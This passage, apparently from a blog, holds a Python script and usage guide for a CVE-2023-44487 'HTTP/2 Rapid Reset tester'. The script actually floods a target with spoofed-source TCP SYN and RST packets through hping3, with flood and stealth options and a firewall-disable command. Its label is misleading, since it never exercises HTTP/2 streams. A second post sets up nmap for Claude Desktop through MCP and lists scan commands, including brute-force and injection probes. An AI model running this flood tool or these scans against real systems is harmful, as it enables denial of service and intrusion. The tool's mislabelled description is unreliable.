                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(packet_rate // 10):  # Batch in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: hping3 provides consistent raw-packet crafting on macOS, but spoofed source addresses may still be dropped by upstream filtering (BCP 38).
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration
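
The assessment printed at the end of a run applies a simple threshold to these numbers: a failure rate above 50% is flagged as a connectivity or firewall problem. Here is a minimal sketch of the same logic, in case you want to post-process saved results yourself:

def summarize(results: dict) -> str:
    """Mirror the thresholds the tester applies in display_results()."""
    duration = results['end_time'] - results['start_time']
    rate = results['total_packets'] / duration if duration > 0 else 0
    total = results['total_packets']
    if total and results['failed_packets'] > total * 0.5:
        return "High failure rate - check connectivity and firewall rules"
    return f"Sent {total} packets from {results['unique_source_ips']} source IPs at ~{rate:.0f} pps"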

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

The macOS application firewall filters inbound connections, so it rarely interferes with outbound packet injection; if traffic does appear to be blocked, allow Python explicitly:

  1. Open System Preferences > Security & Privacy > Firewall
  2. Click “Firewall Options”
  3. Add Python to allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Specify the interface explicitly with the --interface option (hping3's -I flag)

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Launch the Wireshark app (installed by the cask)
open -a Wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process
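
If you prefer to watch the same counters from a script, here is a small sketch using the third-party psutil package (an extra dependency you would need to install with pip; en0 is assumed to be the active interface):

import time
import psutil  # third-party: pip install psutil

prev = psutil.net_io_counters(pernic=True).get('en0')
while True:
    time.sleep(1)
    cur = psutil.net_io_counters(pernic=True).get('en0')
    print(f"out: {cur.packets_sent - prev.packets_sent} pps | "
          f"in: {cur.packets_recv - prev.packets_recv} pps")
    prev = cur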

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# SYN_RECV connections
netstat -an | grep SYN_RECV | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.
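
Concretely, the tester drives hping3 through subprocess calls. A single spoofed SYN corresponds roughly to the sketch below (illustrative rather than the script's exact command line; -a sets the spoofed source address, -S the SYN flag, -p the destination port, -I the interface):

import subprocess

def spoofed_syn(target, port, source_ip, interface=None):
    """Send one SYN with a spoofed source via hping3 (requires root)."""
    cmd = ['hping3', '-S', '-c', '1', '-p', str(port), '-a', source_ip]
    if interface:
        cmd += ['-I', interface]
    cmd.append(target)
    return subprocess.run(cmd, capture_output=True, timeout=10).returncode == 0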

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS-optimized testing script, built on hping3, lets you validate your defenses in a controlled manner, with source-IP spoofing wherever your network path permits it.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.


This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.


macOS: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation
nmap --version

On Linux (Ubuntu/Debian):

sudo apt-get install nmap
nmap --version

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

On macOS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

A popular NMAP MCP server is available on GitHub. We'll clone the repository and build it locally:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
    config = json.load(f)

if 'mcpServers' not in config:
    config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
    "command": "node",
    "args": [
        f"/Users/{username}/nmap-mcp-server/dist/index.js"
    ],
    "env": {}
}

with open(config_file, 'w') as f:
    json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF
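
To confirm the entry was written correctly, you can dump the configured servers back out (a quick check, assuming the same config path as above):

python3 << 'EOF'
import json, os
path = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
with open(path) as f:
    print(json.dumps(json.load(f).get("mcpServers", {}), indent=2))
EOF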


Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services (note that raw SYN scans require root privileges).

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

9. SMB Vulnerability Detection (EternalBlue and Shares)

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

13. FTP Anonymous Access and Vulnerabilities

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

14. Email Server Security Assessment

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: NMAP ships no dedicated XXE script, so the command below checks a related web framework flaw (Apache Struts, CVE-2017-5638); thorough XXE testing generally requires manual tooling or a dedicated web scanner.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access security check. The stock NSE library covers MS12-020 and encryption enumeration; a BlueKeep (CVE-2019-0708) check typically requires a third-party NSE script.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
